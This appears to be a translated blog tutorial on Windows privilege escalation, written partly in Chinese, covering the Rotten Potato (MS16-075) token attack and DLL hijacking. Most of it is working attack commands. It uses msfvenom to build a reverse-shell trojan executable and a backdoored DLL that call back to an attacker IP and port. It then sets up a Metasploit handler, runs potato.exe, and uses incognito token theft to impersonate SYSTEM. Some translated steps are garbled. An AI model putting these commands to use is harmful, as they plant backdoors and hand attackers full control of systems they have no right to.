Elevation of Privilege: Rotten Potatoes || DLL Hijacking.
Privilege escalation is referred to as privilege escalation . Since the operating system is a multi-user operating system , users have permission control . For example, the permissions obtained through Web vulnerabilities are Web process permissions. Often, Web services are started with an account with very low permissions. Therefore, some operations through the Webshell will be restricted, which requires it to be elevated to administrative or even System privileges. Privileges are usually escalated through operating system vulnerabilities or misconfigurations of the operating system, or through third-party software services, such as database or FTP software vulnerabilities.
Table of contents:
Elevation of Privilege: Rotten Potatoes || DLL Hijacking.
RottenPotato (Rotten Potato) The principle of rights escalation:
Principle of DLL hijacking privilege escalation:
Elevation of Privilege: Rotten Potatoes
The first step: Generate a background program. (Trojan horse)
Step 2: Upload the newly generated program to the server to be elevated.
Step 3: Install msf directly on our server.
Step 4: Execute the program on the windows operating system and return to our server ( kali )
Escalation of Privilege: DLL Hijacking
The first step: information collection. (Collect whether there is third-party software)
Step 2: We install the same one ourselves, and then use Tinder Sword to analyze the process.
Step 3: Use the DLL file that generates a backdoor.
Step 4: Put the generated DLL file under the same file, and rename the original file.
Step five: install msf directly on our server.
Step 6: When the third-party software is opened, it will enter the .
Step 7: Use token stealing techniques to escalate privileges.
Disclaimer:
It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.
Elevation of power thought:
RottenPotato (Rotten Potato) The principle of rights escalation:
(1)欺骗 “NT AUTHORITY \ SYSTEM” 账户通过 NTLM 认证到我们控制的TCP终端。
(2)对这个认证过程使用中间人攻击(NTLM重放),为 “NT AUTHORITY \ SYSTEM”
账户本地协商一个安全令牌。这个过程是通过一系列的 Windows API 调用实现的。
(3)模仿这个令牌。只有具有 “模仿安全令牌权限” 的账户才能去模仿别人的令牌。
一般大多数的服务型账户 (IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
所以,一般从web 拿到的 webshell 都是 IIS 服务器权限,是具有这个模仿权限的。
测试过程中,我发现使用已经建好的账户(就是上面说的用户级账户) 去反弹 meterpreter
然后再去执行 EXP 的时候会失败,但使用菜刀( IIS 服务器权限)反弹 meterpreter 就会成功。
非服务类用户权限无法窃取成功(原理)Operation process: Upload Rotten Potatoes - Execute Rotten Potatoes - Use Stealing Module - Steal SYSTEM - Success
Principle of DLL hijacking privilege escalation:
Windows 程序启动的时候需要 DLL,如果这些 DLL 不存在,则可以通过在应用程序要查找的位置
放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下面
的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)Elevation of Privilege: Rotten Potatoes
The first step: Generate a background program. (Trojan horse)
Background program (Trojan): https://tianyuk.blog.csdn.net/article/details/123541093
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105
lport=4444 -f exe > bgxg.exe
// lhost=kali的IP地址
// lport=端口号(比如4444)
// -f exe > 文件名.exe
Step 2: Upload the newly generated program to the server to be elevated.
Step 3: Install msf directly on our server. (I have msf in kali directly for testing here) (the two servers must be able to communicate)
msfconsole //打开 msf 命令
use exploit/multi/handler //加载模块
set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
run //执行命令
Step 4: Execute the program on the windows operating system and return to our server ( kali )
Step 5: If it is not valid to directly use the token to steal, and it is still an IIS permission, then upload Rotten Potatoes.
Rotten Potato Download: windows-kernel-exploits/MS16-075 at master SecWiki/windows-kernel-exploits GitHub
getuid //查看权限(是 IIS 权限才使用下面的.)
pwd //查看当前目录
cd C:// //烂土豆目录下.
execute -cH -f ./potato.exe //执行烂土豆
use incognito //窃取令牌模块
list_tokens -u //查看可以窃取权限
impersonate_token "NT AUTHORITY\SYSTEM" //窃取权限
Escalation of Privilege: DLL Hijacking
The first step: information collection. (Collect whether there is third-party software)
Step 2: We install the same (third-party software) ourselves, and then use Tinder Sword to analyze the (third-party software) process.
Step 3: Use the DLL file that generates a backdoor.
msfvenom -p windows/meterpreter/reverse_tcp lhost=(kali地址)
lport=端口 -f dll > 和进程一样的文件名.dll
Step 4: Put the generated DLL file under the same (process) file, and rename the original file.
Step 5: Install msf directly on our server. (I have msf in kali directly for testing here) (the two servers must be able to communicate)
msfconsole //打开 msf 命令
use exploit/multi/handler //加载模块
set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
run //执行命令
Step 6: When the third-party software is opened, it will enter the .
Step 7: Use token stealing techniques to escalate privileges.
getuid //查看权限
use incognito //窃取令牌模块
list_tokens -u //查看可以窃取权限
impersonate_token "NT AUTHORITY\SYSTEM" //窃取权限
Learning Connections: Day 62: Privilege Escalation - Rotten Potatoes & dll Hijacking & Quoted Paths & Service Permissions_哔哩哔哩_bilibili